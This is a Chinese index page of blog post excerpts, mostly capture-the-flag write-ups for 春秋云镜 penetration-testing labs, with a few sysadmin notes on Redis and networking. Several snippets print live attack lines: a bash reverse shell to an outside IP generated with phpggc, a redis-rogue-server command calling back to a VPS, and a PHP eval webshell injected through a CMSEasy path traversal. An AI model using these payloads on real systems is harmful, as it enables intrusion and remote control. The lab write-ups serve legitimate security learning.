• 2024-10-27【内网攻防】内网穿透隐秘隧道搭建
    没有数值,我只看到了努力和汗水内网穿透Stowaway(多级代理)Stowaway穿透访问第二层内网网络拓扑图首先攻击机(172.22.0.162)运行Stowawayadmin节点在边界机上使用rdyx0上传agent在边界机上使用rdyx0运行agent此时攻击机收到新的连接–reconnect2表
  • 2024-10-09春秋云镜 Privilege
    上来先用fscan扫一下.____/_\_______________||__//_\/____/__|/__|'__/_`|/__||////_\\_____\__\(__|||(_||(__|<\____/|___/\___|_|\__,_|\___|_|\_\
  • 2024-09-27春旗云镜 Spoofing
    扫描发现开放了8080端口dirsearch进行路径扫描.发现是Tomcat9.0.30,该版本存在文件包含漏洞tomcat的许多重要信息存储在/WEB-INF/web.xml下,然而不能直接访问,我们利用漏洞来读文件.python3ajpShooter.pyhttp://39.98.118.38:80808009/WEB-INF/web.xmlread结果如
  • 2024-09-16春秋云镜 GreatWall
    先扔fscan里扫一下发现开放了80端口和8080端口的web服务.访问8080端口发现是thinkphp框架真有洞!写个shell进去.然后使用蚁剑连接,在根目录找到了第一个flag.flag:flag01:flag{176f49b6-147f-4557-99ec-ba0a351e1ada}架个stowaway横向代理,然后传个fscan去扫内网../f
  • 2024-09-04redis-cli创建Redis集群时显式指定主从节点
    背景前些年用python写过一个RedisCluster自动化安装,扩容和缩容的工具,虽然当时官方的的redis-trib.rb集群创建工具提供了集群创建、检查、修复、均衡等命令行功能,个人接受不了redis-trib.rb,原因在于redis-trib.rb需要ruby的环境,同时无法自定义指定集群中节点的主从关系。随后R
  • 2024-09-04春秋云镜 Delivery
    上来先扔fscan去扫一下发现开放ftp服务允许匿名登录.登录发现存在一个pom.xml文件,内容如下<?xmlversion="1.0"encoding="UTF-8"?><projectxmlns="http://maven.apache.org/POM/4.0.0"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  • 2024-09-03春秋云镜 Exchange
    使用fscan进行扫描得到是一个LumiaERP,开放了8000端口存在登录页面.利用网上漏洞进行信息泄露得到账号密码破解密码得到后台登录发现没有写马的地方.这里可以打一个JDBC(不懂java),去打cc6这条链子.在本地去起一个恶意的Mysql服务器,配合ysoserial-all.jar去打JDBC.注意
  • 2024-08-31春秋云镜 Flarum
    访问发现是个FlarumCMS框架.使用rockyou.txt爆破administrator得到密码1chris,登录后台由于题目提示Flarum上执行任意命令,搜到了P牛的文章照着打反序列化.执行命令./phpggc-ptar-bMonolog/RCE6system"bash-c'bash-i>&/dev/tcp/123.57.23.40/11110>&1'"生成t
  • 2024-08-25春秋云镜 网鼎杯2022半决赛
    现用fscan扫一下访问发现是个wordpress,wpscan一下版本为6.2.6,使用了twentytwentyonetheme后台弱密码admin/123456登录由于存在themefileeditor,因此可以写马随便找一个php文件,写入木马.使用蚁剑连接,路径之前wpscan给出来了.得到了第一个flagflag:flag{c0af2d0
  • 2024-08-22春秋云镜 Delegation
    现用fscan扫一下入口机发现是cmseasy,在/admin路由处可以登录,弱密码admin123456这里存在CVE漏洞,写个马进去get:/index.php?case=template&act=save&admin_dir=admin&site=defaultpost:sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent=<?php@eval($_POST[1]);?>
  • 2024-08-20【内网渗透】最保姆级的春秋云镜initial打靶笔记
    目录flag1flag2flag3 flag1外网thinkphp服务 随便找个工具梭连蚁剑读/root目录要提权suid没有可利用的提权命令,打sudo提权sudo-lmysql的sudo提权 Linux提权之Sudo70种提权方法-简单安全 查看文件名带flag的文件sudomysql-e'\!find/-typef-n
  • 2024-08-20春秋云镜 Brute4Road
    先用fscan扫一下内网尝试打redis主从python3redis-rogue-server.py--rhost39.98.122.75--lhost123.57.23.40需要在vps下使用,选择r,然后输入要反弹的ip,port使用pty获得交互式shellpython-c'importpty;pty.spawn("/bin/bash")'尝试UID提权find/-userroot-
  • 2024-08-18春秋云镜 time
    先用fscan扫一下,得到了下面的端口挨个尝试,访问7473发现是个neo4j的服务.这个neo4j的server只出现过这一个历史漏洞我们在网上下载jar漏洞利用文件,然后在本地运行.注意:一定是要java8,同时反弹shell的时候要使用编码防止传输中出现错误运行命令java-jar.\rhino_gadget
  • 2024-08-15春秋云镜 tsclient
    入口机给了个ip首先用fscan扫一下看看发现存在mysql远程登录,弱口令都扫出来了.使用MDUT进行远程登录登录以后上传cs马,选(s)这个.注意要上传到C:/Users/Public/,因为public文件夹通常有写的权限然后执行命令C:/Users/Public/beacon.exe回到cs中成功得到shell调整休眠时
  • 2024-06-22[春秋云镜] Initial
    [春秋云镜]Initial**整套网络环境拓扑:**​​一、打进内网开局一个ip:39.101.184.25,fscan扫一下​​存在thinkphp5.0.23的漏洞,可以rce,我们用工具检测下,然后上传webshell​​然后我们用蚁剑连一下,whoami看一下是www-data权限​​我们在www目录下搜一下flag,没
  • 2024-05-20172.22.56.0/22
    172.22.56.0/2256对应的二进制是00111000,16+6=22。所以第三个byte的后面2位bit可以使用。 TheIPaddressandsubnetmaskyouprovided,172.22.56.0/22,indicateaspecificrangeofIPaddresseswithinaprivatenetwork.Here’sadetailedbreakdown:IPAddress
  • 2024-03-21春秋云镜-Initial
    春秋云镜-Initial谨以此篇,记录我初入渗透学习之路。中间有次我frp开多了,直接寄了,所以重新开过靶机,所以外网ip变了一次。冲了15块买三个沙砾,2个半小时独立完成了,虽然也很菜呃呃,第一次学渗透,啥配置都是现搜的wwwww首先fscan开扫:./fscan-h121.89.223.67找到开放的80端口,而
  • 2024-02-29centos中 查看网络性能
    网络性能测试:用过iperf3,iftop,nload使用iperf或nping进行带宽测试。例如,在一台机器上启动服务器模式:iperf3-s然后在另一台机器上作为客户端发起测试:iperf3-c<server_ip_address>-t60-i1这样可以得到大约一分钟内的带宽测试结果,-t参数指定测试时间,-i参数指定每秒
  • 2024-02-23春秋云境 Privilege WP
    靶标介绍在这个靶场中,您将扮演一名资深黑客,被雇佣来评估虚构公司XRShop的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用,并通过后渗透技巧深入XRShop的内部网络,寻找潜在的弱点和漏洞,并通过滥用Windows特权获取管理员权限,最终并获取隐藏在其内部的核心机密。
  • 2024-01-26春秋云境 Spoofing WP
    春秋云境SpoofingWPSpoofing是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。知
  • 2024-01-18春秋云境 Certify WP
    春秋云境CertifyWPCertify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。Sol
  • 2024-01-13春秋云境 Delegation WP
    春秋云境DelegationWPDelegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机
  • 2023-12-30春秋云境Exchange WP
    靶标介绍Exchange是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个Flag,分布于不同的靶机。*注意:该靶
  • 2023-12-17春秋云境 Time WP
    春秋云境TimeWPflag01首先fscan扫描,发现开放7687端口。猜测为neo4j,Neo4j是一个开源图数据库管理系统。在Neo4j3.4.18及以前,如果开启了Neo4jShell接口,攻击者将可以通过RMI协议以未授权的身份调用任意方法,其中setSessionVariable方法存在反序列化漏洞。因为这个漏洞并非RMI
  • 2023-12-10春秋云境 Brute4Road WP
    靶标介绍Brute4Road是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。flag01结合